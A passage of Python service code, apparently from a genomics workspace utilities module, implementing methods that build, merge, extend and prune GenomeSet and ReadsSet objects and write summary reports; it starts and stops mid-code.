reportObj = {'objects_created': [],\n 'text_message': report\n }\n\n # Save report\n report_info = self.reportClient.create({'report':reportObj, 'workspace_name':params['workspace_name']})\n\n returnVal = { 'report_name': report_info['name'], 'report_ref': report_info['ref'] }\n self.log(console, \"KButil_Merge_GenomeSets DONE\")\n #END KButil_Merge_GenomeSets\n\n # At some point might do deeper type checking...\n if not isinstance(returnVal, dict):\n raise ValueError('Method KButil_Merge_GenomeSets return value ' +\n 'returnVal is not type dict as required.')\n # return the results\n return [returnVal]\n\n def KButil_Build_GenomeSet(self, ctx, params):\n \"\"\"\n :param params: instance of type \"KButil_Build_GenomeSet_Params\"\n (KButil_Build_GenomeSet() ** ** Method for creating a GenomeSet)\n -> structure: parameter \"workspace_name\" of type \"workspace_name\"\n (** The workspace object refs are of form: ** ** objects =\n ws.get_objects([{'ref':\n params['workspace_id']+'/'+params['obj_name']}]) ** ** \"ref\" means\n the entire name combining the workspace id and the object name **\n \"id\" is a numerical identifier of the workspace or object, and\n should just be used for workspace ** \"name\" is a string identifier\n of a workspace or object. This is received from Narrative.),\n parameter \"input_refs\" of type \"data_obj_ref\", parameter\n \"output_name\" of type \"data_obj_name\", parameter \"desc\" of String\n :returns: instance of type \"KButil_Build_GenomeSet_Output\" ->\n structure: parameter \"report_name\" of type \"data_obj_name\",\n parameter \"report_ref\" of type \"data_obj_ref\"\n \"\"\"\n # ctx is the context object\n # return variables are: returnVal\n #BEGIN KButil_Build_GenomeSet\n console = []\n invalid_msgs = []\n self.log(console, 'Running KButil_Build_GenomeSet with params=')\n self.log(console, \"\\n\" + pformat(params))\n report = ''\n\n\n # check params\n required_params = ['workspace_name',\n 'input_refs',\n 'output_name'\n ]\n self.check_params (params, required_params)\n if 'desc' not in params:\n params['desc'] = params['output_name']+' Built GenomeSet'\n\n # clean input_refs\n clean_input_refs = []\n for ref in params['input_refs']:\n if ref is not None and ref != '' and ref not in clean_input_refs:\n clean_input_refs.append(ref)\n params['input_refs'] = clean_input_refs\n\n if len(params['input_refs']) < 1:\n self.log(console, \"Must provide at least one Genome\")\n self.log(invalid_msgs, \"Must provide at least one Genome\")\n\n # Build GenomeSet\n #\n elements = {}\n genome_seen = dict()\n\n for genomeRef in params['input_refs']:\n\n if not genome_seen.get(genomeRef):\n genome_seen[genomeRef] = True\n\n (genomeObj,\n info,\n obj_name,\n type_name) = self.get_obj_data(genomeRef, 'genome')\n\n if type_name != 'Genome' and type_name != 'GenomeAnnotation':\n errMsg = \"Bad Type: Should be Genome or GenomeAnnotation not '{}' for ref: '{}'\"\n raise ValueError(errMsg.format(type_name, genomeRef))\n\n if type_name == 'Genome':\n genome_id = genomeObj['id']\n else:\n genome_id = genomeObj['genome_annotation_id']\n genome_sci_name = genomeObj['scientific_name']\n\n if genomeRef not in list(elements.keys()):\n elements[genomeRef] = dict()\n elements[genomeRef]['ref'] = genomeRef # the key line\n self.log(console, \"adding element {} ({}) aka ({}): {}\".format(obj_name,\n genome_sci_name,\n genome_id,\n genomeRef))\n\n # set provenance\n self.log(console, \"SETTING PROVENANCE\")\n input_ws_obj_refs = params['input_refs']\n provenance = self.set_provenance(ctx, 
input_ws_obj_refs, 'kb_SetUtilities', 'KButil_Build_GenomeSet')\n\n # Store output object\n if len(invalid_msgs) == 0:\n self.log(console, \"SAVING GENOMESET\")\n output_GenomeSet = {'description': params['desc'],\n 'elements': elements}\n\n new_obj_info = self.wsClient.save_objects({'workspace': params['workspace_name'],\n 'objects': [{'type': 'KBaseSearch.GenomeSet',\n 'data': output_GenomeSet,\n 'name': params['output_name'],\n 'meta': {},\n 'provenance': provenance}]})[0]\n\n # build output report object\n #\n self.log(console, \"BUILDING REPORT\")\n if len(invalid_msgs) == 0:\n self.log(console, \"genomes in output set \" + params['output_name'] +\n \": \" + str(len(list(elements.keys()))))\n report += 'genomes in output set ' + params['output_name'] + ': '\n report += str(len(list(elements.keys()))) + \"\\n\"\n reportObj = {\n 'objects_created': [{'ref': params['workspace_name'] + '/' + params['output_name'],\n 'description':'KButil_Build_GenomeSet'}],\n 'text_message': report\n }\n else:\n report += \"FAILURE:\\n\\n\" + \"\\n\".join(invalid_msgs) + \"\\n\"\n reportObj = {'objects_created': [],\n 'text_message': report}\n\n # Save report\n report_info = self.reportClient.create({'report':reportObj, 'workspace_name':params['workspace_name']})\n\n returnVal = { 'report_name': report_info['name'], 'report_ref': report_info['ref'] }\n self.log(console, \"KButil_Build_GenomeSet DONE\")\n #END KButil_Build_GenomeSet\n\n # At some point might do deeper type checking...\n if not isinstance(returnVal, dict):\n raise ValueError('Method KButil_Build_GenomeSet return value ' +\n 'returnVal is not type dict as required.')\n # return the results\n return [returnVal]\n\n def KButil_Build_GenomeSet_from_FeatureSet(self, ctx, params):\n \"\"\"\n :param params: instance of type\n \"KButil_Build_GenomeSet_from_FeatureSet_Params\"\n (KButil_Build_GenomeSet_from_FeatureSet() ** ** Method for\n obtaining a GenomeSet from a FeatureSet) -> structure: parameter\n \"workspace_name\" of type \"workspace_name\" (** The workspace object\n refs are of form: ** ** objects = ws.get_objects([{'ref':\n params['workspace_id']+'/'+params['obj_name']}]) ** ** \"ref\" means\n the entire name combining the workspace id and the object name **\n \"id\" is a numerical identifier of the workspace or object, and\n should just be used for workspace ** \"name\" is a string identifier\n of a workspace or object. 
This is received from Narrative.),\n           parameter \"input_ref\" of type \"data_obj_ref\", parameter\n           \"output_name\" of type \"data_obj_name\", parameter \"desc\" of String\n           :returns: instance of type\n           \"KButil_Build_GenomeSet_from_FeatureSet_Output\" -> structure:\n           parameter \"report_name\" of type \"data_obj_name\", parameter\n           \"report_ref\" of type \"data_obj_ref\"\n        \"\"\"\n        # ctx is the context object\n        # return variables are: returnVal\n        #BEGIN KButil_Build_GenomeSet_from_FeatureSet\n        console = []\n        invalid_msgs = []\n        self.log(console, 'Running KButil_Build_GenomeSet_from_FeatureSet with params=')\n        self.log(console, \"\\n\" + pformat(params))\n        report = ''\n\n\n        # check params\n        required_params = ['workspace_name',\n                           'input_ref',\n                           'output_name'\n                           ]\n        self.check_params (params, required_params)\n        if 'desc' not in params:\n            params['desc'] = params['output_name']+' Built GenomeSet'\n\n        # Obtain FeatureSet\n        (featureSet,\n         info,\n         obj_name,\n         type_name) = self.get_obj_data(params['input_ref'], 'featureSet')\n\n        if type_name != 'FeatureSet':\n            raise ValueError(\"Bad Type: Should be FeatureSet instead of '\" + type_name + \"'\")\n\n        # Build GenomeSet\n        elements = {}\n        genome_seen = dict()\n\n        for fId in list(featureSet['elements'].keys()):\n            for genomeRef in featureSet['elements'][fId]:\n\n                if not genome_seen.get(genomeRef):\n                    genome_seen[genomeRef] = True\n\n                    (genomeObj,\n                     info,\n                     obj_name,\n                     type_name) = self.get_obj_data(genomeRef, 'genome')\n\n                    if type_name == 'AnnotatedMetagenomeAssembly':\n                        self.log(console, \"SKIPPING AnnotatedMetagenomeAssembly Object \"+obj_name)\n                        continue\n                    elif type_name != 'Genome' and type_name != 'GenomeAnnotation':\n                        errMsg = \"Bad Type: Should be Genome or GenomeAnnotation instead\"\n                        errMsg += \" of '{}' for ref: '{}'\"\n                        raise ValueError(errMsg.format(type_name, genomeRef))\n\n                    if type_name == 'Genome':\n                        genome_id = genomeObj['id']\n                    else:\n                        genome_id = genomeObj['genome_annotation_id']\n                    genome_sci_name = genomeObj['scientific_name']\n\n                    #if not genome_id in elements.keys():\n                    #    elements[genome_id] = dict()\n                    #elements[genome_id]['ref'] = genomeRef  # the key line\n                    if genomeRef not in list(elements.keys()):\n                        elements[genomeRef] = dict()\n                        elements[genomeRef]['ref'] = genomeRef  # the key line\n                        self.log(console, \"adding element {} ({}/{}) : {}\".format(obj_name,\n                                                                                  genome_sci_name,\n                                                                                  genome_id,\n                                                                                  genomeRef))\n\n        # set provenance\n        self.log(console, \"SETTING PROVENANCE\")\n        input_ws_obj_refs = [params['input_ref']]\n        provenance = self.set_provenance(ctx, input_ws_obj_refs, 'kb_SetUtilities', 'KButil_Build_GenomeSet_from_FeatureSet')\n\n        # Store output object\n        #\n        if len(invalid_msgs) == 0:\n            self.log(console, \"SAVING GENOMESET\")\n            output_GenomeSet = {'description': params['desc'],\n                                'elements': elements}\n\n            new_obj_info = self.wsClient.save_objects({'workspace': params['workspace_name'],\n                                                       'objects': [{'type': 'KBaseSearch.GenomeSet',\n                                                                    'data': output_GenomeSet,\n                                                                    'name': params['output_name'],\n                                                                    'meta': {},\n                                                                    'provenance': provenance}]})[0]\n\n        # build output report object\n        #\n        self.log(console, \"BUILDING REPORT\")\n        if len(invalid_msgs) == 0:\n            self.log(console, \"genomes in output set \" + params['output_name'] + \": \" +\n                     str(len(list(elements.keys()))))\n            report += 'genomes in output set {}:{}\\n'.format(params['output_name'],\n                                                             len(list(elements.keys())))\n            ref = \"{}/{}\".format(params['workspace_name'], params['output_name'])\n            reportObj = {'objects_created': [{'ref': ref,\n                                              'description': 
'KButil_Build_GenomeSet_from_FeatureSet'}],\n 'text_message': report}\n else:\n report += \"FAILURE:\\n\\n\" + \"\\n\".join(invalid_msgs) + \"\\n\"\n reportObj = {'objects_created': [],\n 'text_message': report}\n\n # Save report\n report_info = self.reportClient.create({'report':reportObj, 'workspace_name':params['workspace_name']})\n\n returnVal = { 'report_name': report_info['name'], 'report_ref': report_info['ref'] }\n self.log(console, \"KButil_Build_GenomeSet_from_FeatureSet DONE\")\n #END KButil_Build_GenomeSet_from_FeatureSet\n\n # At some point might do deeper type checking...\n if not isinstance(returnVal, dict):\n raise ValueError('Method KButil_Build_GenomeSet_from_FeatureSet return value ' +\n 'returnVal is not type dict as required.')\n # return the results\n return [returnVal]\n\n def KButil_Add_Genomes_to_GenomeSet(self, ctx, params):\n \"\"\"\n :param params: instance of type\n \"KButil_Add_Genomes_to_GenomeSet_Params\"\n (KButil_Add_Genomes_to_GenomeSet() ** ** Method for adding a\n Genome to a GenomeSet) -> structure: parameter \"workspace_name\" of\n type \"workspace_name\" (** The workspace object refs are of form:\n ** ** objects = ws.get_objects([{'ref':\n params['workspace_id']+'/'+params['obj_name']}]) ** ** \"ref\" means\n the entire name combining the workspace id and the object name **\n \"id\" is a numerical identifier of the workspace or object, and\n should just be used for workspace ** \"name\" is a string identifier\n of a workspace or object. This is received from Narrative.),\n parameter \"input_genome_refs\" of list of type \"data_obj_ref\",\n parameter \"input_genomeset_ref\" of type \"data_obj_ref\", parameter\n \"output_name\" of type \"data_obj_name\", parameter \"desc\" of String\n :returns: instance of type \"KButil_Add_Genomes_to_GenomeSet_Output\"\n -> structure: parameter \"report_name\" of type \"data_obj_name\",\n parameter \"report_ref\" of type \"data_obj_ref\"\n \"\"\"\n # ctx is the context object\n # return variables are: returnVal\n #BEGIN KButil_Add_Genomes_to_GenomeSet\n\n # init\n [OBJID_I, NAME_I, TYPE_I, SAVE_DATE_I, VERSION_I, SAVED_BY_I, WSID_I, WORKSPACE_I, CHSUM_I, SIZE_I, META_I] = list(range(11)) # object_info tuple\n console = []\n invalid_msgs = []\n self.log(console, 'Running KButil_Add_Genomes_to_GenomeSet with params=')\n self.log(console, \"\\n\" + pformat(params))\n report = ''\n\n\n # check params\n required_params = ['workspace_name',\n 'input_genome_refs',\n 'input_genomeset_ref',\n 'output_name'\n ]\n self.check_params (params, required_params)\n if 'desc' not in params:\n params['desc'] = params['output_name']+' Increased GenomeSet'\n\n # Build GenomeSet\n elements = dict()\n query_genome_ref_order = []\n \n # add old GenomeSet\n #\n if 'input_genomeset_ref' in params and params['input_genomeset_ref'] is not None:\n (genomeSet,\n info,\n obj_name,\n type_name) = self.get_obj_data(params['input_genomeset_ref'], 'genomeSet')\n\n if type_name != 'GenomeSet':\n raise ValueError(\"Bad Type: Should be GenomeSet instead of '\" + type_name + \"'\")\n\n for gId in list(genomeSet['elements'].keys()):\n genomeRef = genomeSet['elements'][gId]['ref']\n\n if not elements.get(genomeRef):\n elements[genomeRef] = dict()\n elements[genomeRef]['ref'] = genomeRef # the key line\n self.log(console, \"adding element \" + gId + \" : \" + genomeRef)\n\n query_genome_ref_order.append(genomeRef)\n \n\n # add new genomes\n #\n genomeSet_obj_types = [\"KBaseSearch.GenomeSet\", \"KBaseSets.GenomeSet\"]\n genome_obj_types = 
[\"KBaseGenomes.Genome\", \"KBaseGenomeAnnotations.Genome\"]\n tree_obj_types = [\"KBaseTrees.Tree\"]\n for input_ref in params['input_genome_refs']:\n\n (query_genome_obj_data,\n query_genome_obj_info,\n query_genome_obj_name,\n query_genome_obj_type) = self.get_obj_data(input_ref, 'genome or genomeSet', full_type=True)\n\n # just a genome\n if query_genome_obj_type in genome_obj_types:\n if input_ref not in elements:\n elements[input_ref] = dict()\n elements[input_ref]['ref'] = input_ref # the key line\n self.log(console, \"adding element \" + input_ref)\n query_genome_ref_order.append(input_ref)\n\n # handle genomeSet\n elif query_genome_obj_type in genomeSet_obj_types:\n for genome_id in sorted(query_genome_obj_data['elements'].keys()):\n genome_ref = query_genome_obj_data['elements'][genome_id]['ref']\n if genome_ref not in elements:\n elements[genome_ref] = dict()\n elements[genome_ref]['ref'] = genome_ref # the key line\n self.log(console, \"adding element \" + genome_ref)\n query_genome_ref_order.append(genome_ref)\n\n # handle tree type\n elif query_genome_obj_type in tree_obj_types:\n for genome_id in sorted(query_genome_obj_data['ws_refs'].keys()):\n genome_ref = query_genome_obj_data['ws_refs'][genome_id]['g'][0]\n if genome_ref not in elements:\n elements[genome_ref] = dict()\n elements[genome_ref]['ref'] = genome_ref # the key line\n self.log(console, \"adding element \" + genome_ref)\n query_genome_ref_order.append(genome_ref)\n else: \n raise ValueError (\"bad type for input_genome_refs\")\n\n\n # set provenance\n self.log(console, \"SETTING PROVENANCE\")\n input_ws_obj_refs = [params['input_genomeset_ref']]\n input_ws_obj_refs.extend(params['input_genome_refs'])\n provenance = self.set_provenance(ctx, input_ws_obj_refs, 'kb_SetUtilities', 'KButil_Add_Genomes_to_GenomeSet')\n\n # Store output object\n #\n if len(invalid_msgs) == 0:\n self.log(console, \"SAVING GENOMESET\")\n output_GenomeSet = {'description': params['desc'],\n 'elements': elements}\n\n new_obj_info = self.wsClient.save_objects({'workspace': params['workspace_name'],\n 'objects': [{\n 'type': 'KBaseSearch.GenomeSet',\n 'data': output_GenomeSet,\n 'name': params['output_name'],\n 'meta': {},\n 'provenance': provenance}]})[0]\n\n # build output report object\n self.log(console, \"BUILDING REPORT\")\n if len(invalid_msgs) == 0:\n self.log(console, \"genomes in output set \" + params['output_name'] + \": \" +\n str(len(list(elements.keys()))))\n report += 'genomes in output set ' + params['output_name'] + ': '\n report += str(len(list(elements.keys()))) + \"\\n\"\n reportObj = {\n 'objects_created': [{'ref': params['workspace_name'] + '/' + params['output_name'],\n 'description':'KButil_Add_Genomes_to_GenomeSet'}],\n 'text_message': report}\n else:\n report += \"FAILURE:\\n\\n\" + \"\\n\".join(invalid_msgs) + \"\\n\"\n reportObj = {'objects_created': [],\n 'text_message': report}\n\n # Save report\n report_info = self.reportClient.create({'report':reportObj, 'workspace_name':params['workspace_name']})\n\n returnVal = { 'report_name': report_info['name'], 'report_ref': report_info['ref'] }\n self.log(console, \"KButil_Add_Genomes_to_GenomeSet DONE\")\n #END KButil_Add_Genomes_to_GenomeSet\n\n # At some point might do deeper type checking...\n if not isinstance(returnVal, dict):\n raise ValueError('Method KButil_Add_Genomes_to_GenomeSet return value ' +\n 'returnVal is not type dict as required.')\n # return the results\n return [returnVal]\n\n def KButil_Remove_Genomes_from_GenomeSet(self, ctx, params):\n 
\"\"\"\n :param params: instance of type\n \"KButil_Remove_Genomes_from_GenomeSet_Params\"\n (KButil_Remove_Genomes_from_GenomeSet() ** ** Method for removing\n Genomes from a GenomeSet) -> structure: parameter \"workspace_name\"\n of type \"workspace_name\" (** The workspace object refs are of\n form: ** ** objects = ws.get_objects([{'ref':\n params['workspace_id']+'/'+params['obj_name']}]) ** ** \"ref\" means\n the entire name combining the workspace id and the object name **\n \"id\" is a numerical identifier of the workspace or object, and\n should just be used for workspace ** \"name\" is a string identifier\n of a workspace or object. This is received from Narrative.),\n parameter \"input_genome_refs\" of list of type \"data_obj_ref\",\n parameter \"nonlocal_genome_names\" of list of type \"data_obj_name\",\n parameter \"input_genomeset_ref\" of type \"data_obj_ref\", parameter\n \"output_name\" of type \"data_obj_name\", parameter \"desc\" of String\n :returns: instance of type\n \"KButil_Remove_Genomes_from_GenomeSet_Output\" -> structure:\n parameter \"report_name\" of type \"data_obj_name\", parameter\n \"report_ref\" of type \"data_obj_ref\"\n \"\"\"\n # ctx is the context object\n # return variables are: returnVal\n #BEGIN KButil_Remove_Genomes_from_GenomeSet\n\n # init\n console = []\n invalid_msgs = []\n self.log(console, 'Running KButil_Remove_Genomes_from_GenomeSet with params=')\n self.log(console, \"\\n\" + pformat(params))\n report = ''\n [OBJID_I, NAME_I, TYPE_I, SAVE_DATE_I, VERSION_I, SAVED_BY_I, WSID_I, WORKSPACE_I, CHSUM_I, SIZE_I, META_I] = list(range(11)) # object_info tuple\n\n\n # check params\n required_params = ['workspace_name',\n 'input_genomeset_ref',\n 'output_name'\n ]\n self.check_params (params, required_params)\n if 'desc' not in params:\n params['desc'] = params['output_name']+' Reduced GenomeSet'\n if not params.get('input_genome_refs') and \\\n not params.get('nonlocal_genome_names'):\n raise ValueError('must define either Local genomes or Non-local genomes to remove')\n\n \n # read orig GenomeSet\n #\n genomeSet_workspace = None\n if 'input_genomeset_ref' in params and params['input_genomeset_ref'] is not None:\n\n (genomeSet,\n info,\n obj_name,\n type_name) = self.get_obj_data(params['input_genomeset_ref'], 'genomeSet')\n\n if type_name != 'GenomeSet':\n raise ValueError(\"Bad Type: Should be GenomeSet instead of '\" + type_name + \"'\")\n genomeSet_workspace = info[WORKSPACE_I]\n\n\n # Build list of genome refs (without version) to skip.\n # Note: standardize to workspace_name and obj_id\n skip_genomes_by_ref = dict()\n nonlocal_skip_genome_refs = []\n if params.get('input_genome_refs'):\n for genomeRef in params['input_genome_refs']: \n (this_obj_info,\n this_obj_name,\n this_obj_type) = self.get_obj_info(genomeRef, 'genome')\n\n standardized_genomeRef = self.get_obj_ref_from_obj_info_noVer(this_obj_info)\n skip_genomes_by_ref[standardized_genomeRef] = True\n if params.get('nonlocal_genome_names'):\n for gId in list(genomeSet['elements'].keys()):\n genomeRef = genomeSet['elements'][gId]['ref']\n (genome_obj_info,\n this_genome_objname,\n type_name) = self.get_obj_info(genomeRef, 'genome')\n\n this_genome_workspace = genome_obj_info[WORKSPACE_I]\n standardized_genomeRef = self.get_obj_ref_from_obj_info_noVer(genome_obj_info)\n if this_genome_workspace != genomeSet_workspace \\\n and this_genome_objname in params['nonlocal_genome_names']:\n skip_genomes_by_ref[standardized_genomeRef] = True\n 
nonlocal_skip_genome_refs.append(standardized_genomeRef)\n\n        # build new genome set without skip genomes\n        elements = dict()\n        for gId in list(genomeSet['elements'].keys()):\n            genomeRef = genomeSet['elements'][gId]['ref']\n            (this_obj_info,\n             this_genome_obj_name,\n             this_genome_obj_type) = self.get_obj_info(genomeRef, 'genome')\n\n            standardized_genomeRef = self.get_obj_ref_from_obj_info_noVer(this_obj_info)\n\n            # this is where they are removed\n            if not skip_genomes_by_ref.get(standardized_genomeRef):\n                elements[gId] = dict()\n                elements[gId]['ref'] = genomeRef  # the key line\n                self.log(console, \"keeping element \" + gId + \" : \" + genomeRef)\n            else:\n                self.log(console, \"removing element \" + gId + \" : \" + genomeRef)\n\n        # set provenance\n        self.log(console, \"SETTING PROVENANCE\")\n        input_ws_obj_refs = [params['input_genomeset_ref']]\n        if params.get('input_genome_refs'):\n            input_ws_obj_refs.extend(params['input_genome_refs'])\n        provenance = self.set_provenance(ctx, input_ws_obj_refs, 'kb_SetUtilities', 'KButil_Remove_Genomes_from_GenomeSet')\n\n        # Store output object\n        #\n        if len(invalid_msgs) == 0:\n            self.log(console, \"SAVING GENOMESET\")\n            output_GenomeSet = {'description': params['desc'],\n                                'elements': elements}\n\n            new_obj_info = self.wsClient.save_objects({'workspace': params['workspace_name'],\n                                                       'objects': [{\n                                                           'type': 'KBaseSearch.GenomeSet',\n                                                           'data': output_GenomeSet,\n                                                           'name': params['output_name'],\n                                                           'meta': {},\n                                                           'provenance': provenance}]})[0]\n\n        # build output report object\n        self.log(console, \"BUILDING REPORT\")\n        if len(invalid_msgs) == 0:\n            self.log(console, \"genomes in output set \" + params['output_name'] + \": \" +\n                     str(len(list(elements.keys()))))\n            report += 'genomes in output set ' + params['output_name'] + ': '\n            report += str(len(list(elements.keys()))) + \"\\n\"\n            reportObj = {\n                'objects_created': [{'ref': params['workspace_name'] + '/' + params['output_name'],\n                                     'description':'KButil_Remove_Genomes_from_GenomeSet'}],\n                'text_message': report}\n        else:\n            report += \"FAILURE:\\n\\n\" + \"\\n\".join(invalid_msgs) + \"\\n\"\n            reportObj = {'objects_created': [],\n                         'text_message': report}\n\n        # Save report\n        report_info = self.reportClient.create({'report':reportObj, 'workspace_name':params['workspace_name']})\n\n        returnVal = { 'report_name': report_info['name'], 'report_ref': report_info['ref'] }\n        self.log(console, \"KButil_Remove_Genomes_from_GenomeSet DONE\")\n        #END KButil_Remove_Genomes_from_GenomeSet\n\n        # At some point might do deeper type checking...\n        if not isinstance(returnVal, dict):\n            raise ValueError('Method KButil_Remove_Genomes_from_GenomeSet return value ' +\n                             'returnVal is not type dict as required.')\n        # return the results\n        return [returnVal]\n\n    def KButil_Build_ReadsSet(self, ctx, params):\n        \"\"\"\n        :param params: instance of type \"KButil_Build_ReadsSet_Params\"\n           (KButil_Build_ReadsSet() ** ** Method for creating a ReadsSet) ->\n           structure: parameter \"workspace_name\" of type \"workspace_name\" (**\n           The workspace object refs are of form: ** ** objects =\n           ws.get_objects([{'ref':\n           params['workspace_id']+'/'+params['obj_name']}]) ** ** \"ref\" means\n           the entire name combining the workspace id and the object name **\n           \"id\" is a numerical identifier of the workspace or object, and\n           should just be used for workspace ** \"name\" is a string identifier\n           of a workspace or object. 
This is received from Narrative.),\n parameter \"input_refs\" of type \"data_obj_ref\", parameter\n \"output_name\" of type \"data_obj_name\", parameter \"desc\" of String\n :returns: instance of type \"KButil_Build_ReadsSet_Output\" ->\n structure: parameter \"report_name\" of type \"data_obj_name\",\n parameter \"report_ref\" of type \"data_obj_ref\"\n \"\"\"\n # ctx is the context object\n # return variables are: returnVal\n #BEGIN KButil_Build_ReadsSet\n console = []\n invalid_msgs = []\n self.log(console,'Running KButil_Build_ReadsSet with params=')\n self.log(console, \"\\n\" + pformat(params))\n report = ''\n\n\n # check params\n required_params = ['workspace_name',\n 'input_refs',\n 'output_name'\n ]\n self.check_params (params, required_params)\n if 'desc' not in params:\n params['desc'] = params['output_name']+' Built ReadsSet'\n\n \n # clean input_refs\n clean_input_refs = []\n for ref in params['input_refs']:\n if ref is not None and ref != '' and ref not in clean_input_refs:\n clean_input_refs.append(ref)\n params['input_refs'] = clean_input_refs\n\n if len(params['input_refs']) < 1:\n self.log(console,\"Must provide at least one Reads Lib\")\n self.log(invalid_msgs,\"Must provide at least one Reads Lib\")\n\n # Build ReadsSet\n #\n items = []\n lib_seen = dict()\n set_type = None\n\n for libRef in params['input_refs']:\n\n if not lib_seen.get(libRef):\n lib_seen[libRef] = True\n\n (libObj,\n info,\n lib_name,\n lib_type) = self.get_obj_data(libRef, 'reads library')\n\n if set_type is None:\n set_type = lib_type\n elif lib_type != set_type:\n raise ValueError(\"Don't currently support heterogeneous ReadsSets\"+\n \" (e.g. PairedEndLibrary and SingleEndLibrary).\" +\n \" You have more than one type in your input\")\n\n if lib_type != 'SingleEndLibrary' and lib_type != 'PairedEndLibrary':\n errMsg = \"Bad Type: Should be SingleEndLibrary or PairedEndLibrary instead of \"\n errMsg += \"'{}' for ref: '{}'\"\n raise ValueError(errMsg.format(lib_type, libRef))\n\n # add lib\n self.log(console, \"adding lib \" + lib_name + \" : \" + libRef)\n items.append({'ref': libRef, 'label': lib_name})\n\n\n # Store output object\n #\n if len(invalid_msgs) == 0:\n self.log(console, \"SAVING READS_SET\")\n\n output_readsSet_obj = {'description': params['desc'],\n 'items': items}\n output_readsSet_name = params['output_name']\n try:\n rSet_ref = self.setAPI_Client.save_reads_set_v1(\n {'workspace_name': params['workspace_name'],\n 'output_object_name': output_readsSet_name,\n 'data': output_readsSet_obj})['set_ref']\n except Exception as e:\n errMsg = 'SetAPI Error: Unable to save read library set obj to workspace: ({})\\n{}'\n raise ValueError(errMsg.format(params['workspace_name'], str(e)))\n\n # build output report object\n #\n self.log(console, \"SAVING REPORT\")\n if len(invalid_msgs) == 0:\n self.log(console, \"reads libs in output set \" + params['output_name'] + \": \" +\n str(len(params['input_refs'])))\n report += 'reads libs in output set ' + params['output_name'] + ': ' + str(\n len(params['input_refs']))\n reportObj = {\n 'objects_created': [{'ref': params['workspace_name'] + '/' + params['output_name'],\n 'description': 'KButil_Build_ReadsSet'}],\n 'text_message': report}\n else:\n report += \"FAILURE:\\n\\n\"+\"\\n\".join(invalid_msgs)+\"\\n\"\n reportObj = {'objects_created': [], 'text_message': report}\n\n # Save report\n report_info = self.reportClient.create({'report':reportObj, 'workspace_name':params['workspace_name']})\n\n returnVal = { 'report_name': report_info['name'], 
'report_ref': report_info['ref'] }\n self.log(console, \"KButil_Build_ReadsSet DONE\")\n #END KButil_Build_ReadsSet\n\n # At some point might do deeper type checking...\n if not isinstance(returnVal, dict):\n raise ValueError('Method KButil_Build_ReadsSet return value ' +\n 'returnVal is not type dict as required.')\n # return the results\n return [returnVal]\n\n def KButil_Merge_MultipleReadsSets_to_OneReadsSet(self, ctx, params):\n \"\"\"\n :param params: instance of type\n \"KButil_Merge_MultipleReadsSets_to_OneReadsSet_Params\"\n (KButil_Merge_MultipleReadsSets_to_OneReadsSet() ** ** Method for\n merging multiple ReadsSets into one ReadsSet) -> structure:\n parameter \"workspace_name\" of type \"workspace_name\" (** The\n workspace object refs are of form: ** ** objects =\n ws.get_objects([{'ref':\n params['workspace_id']+'/'+params['obj_name']}]) ** ** \"ref\" means\n the entire name combining the workspace id and the object name **\n \"id\" is a numerical identifier of the workspace or object, and\n should just be used for workspace ** \"name\" is a string identifier\n of a workspace or object. This is received from Narrative.),\n parameter \"input_refs\" of type \"data_obj_ref\", parameter\n \"output_name\" of type \"data_obj_name\", parameter \"desc\" of String\n :returns: instance of type\n \"KButil_Merge_MultipleReadsSets_to_OneReadsSet_Output\" ->\n structure: parameter \"report_name\" of type \"data_obj_name\",\n parameter \"report_ref\" of type \"data_obj_ref\"\n \"\"\"\n # ctx is the context object\n # return variables are: returnVal\n #BEGIN KButil_Merge_MultipleReadsSets_to_OneReadsSet\n console = []\n invalid_msgs = []\n report = ''\n self.log(console, 'Running KButil_Merge_MultipleReadsSets_to_OneReadsSet with parameters: ')\n self.log(console, \"\\n\"+pformat(params))\n\n # check params\n required_params = ['workspace_name',\n 'input_refs',\n 'output_name'\n ]\n self.check_params (params, required_params)\n\n # clean input_refs\n clean_input_refs = []\n for ref in params['input_refs']:\n if ref is not None and ref != '' and ref not in clean_input_refs:\n clean_input_refs.append(ref)\n params['input_refs'] = clean_input_refs\n\n if len(params['input_refs']) < 2:\n self.log(console,\"Must provide at least two ReadsSets\")\n self.log(invalid_msgs,\"Must provide at least two ReadsSets\")\n\n # init output object fields and SetAPI\n combined_readsSet_ref_list = []\n combined_readsSet_name_list = []\n combined_readsSet_label_list = []\n\n # Iterate through list of ReadsSets\n #\n reads_lib_type = None\n reads_lib_ref_seen = dict()\n accepted_libs = []\n repeat_libs = []\n for set_i,this_readsSet_ref in enumerate(params['input_refs']):\n accepted_libs.append([])\n repeat_libs.append([])\n\n (input_reads_obj_info,\n input_reads_obj_name,\n input_reads_obj_type) = self.get_obj_info(this_readsSet_ref, 'reads set', full_type=True)\n \n acceptable_types = [\"KBaseSets.ReadsSet\"]\n if input_reads_obj_type not in acceptable_types:\n raise ValueError(\"Input reads of type: '\" + input_reads_obj_type +\n \"'. 
Must be one of \" + \", \".join(acceptable_types))\n\n # iterate through read libraries in read set and add new ones to combined ReadsSet\n try:\n input_readsSet_obj = self.setAPI_Client.get_reads_set_v1({\n 'ref': this_readsSet_ref,\n 'include_item_info': 1})\n except Exception as e:\n raise ValueError('SetAPI Error: Unable to get read library set from workspace: (' +\n this_readsSet_ref + \")\\n\" + str(e))\n\n for readsLibrary_obj in input_readsSet_obj['data']['items']:\n this_readsLib_ref = readsLibrary_obj['ref']\n this_readsLib_label = readsLibrary_obj['label']\n (this_readsLib_name, this_readsLib_type) = self.get_obj_name_and_type_from_obj_info (readsLibrary_obj['info'])\n if reads_lib_type is None:\n reads_lib_type = this_readsLib_type\n elif this_readsLib_type != reads_lib_type:\n raise ValueError (\"inconsistent reads library types in ReadsSets. \" +\n \"Must all be PairedEndLibrary or SingleEndLibrary to merge\")\n\n if this_readsLib_ref not in reads_lib_ref_seen:\n reads_lib_ref_seen[this_readsLib_ref] = True\n combined_readsSet_ref_list.append(this_readsLib_ref)\n combined_readsSet_label_list.append(this_readsLib_label)\n combined_readsSet_name_list.append(this_readsLib_name)\n accepted_libs[set_i].append(this_readsLib_ref)\n else:\n repeat_libs[set_i].append(this_readsLib_ref)\n\n # Save Merged ReadsSet\n #\n items = []\n for lib_i,lib_ref in enumerate(combined_readsSet_ref_list):\n items.append({'ref': lib_ref,\n 'label': combined_readsSet_label_list[lib_i]\n #'data_attachment': ,\n #'info':\n })\n output_readsSet_obj = { 'description': params['desc'],\n 'items': items\n }\n output_readsSet_name = params['output_name']\n try:\n output_readsSet_ref = self.setAPI_Client.save_reads_set_v1 ({'workspace_name': params['workspace_name'],\n 'output_object_name': output_readsSet_name,\n 'data': output_readsSet_obj\n })['set_ref']\n except Exception as e:\n raise ValueError('SetAPI 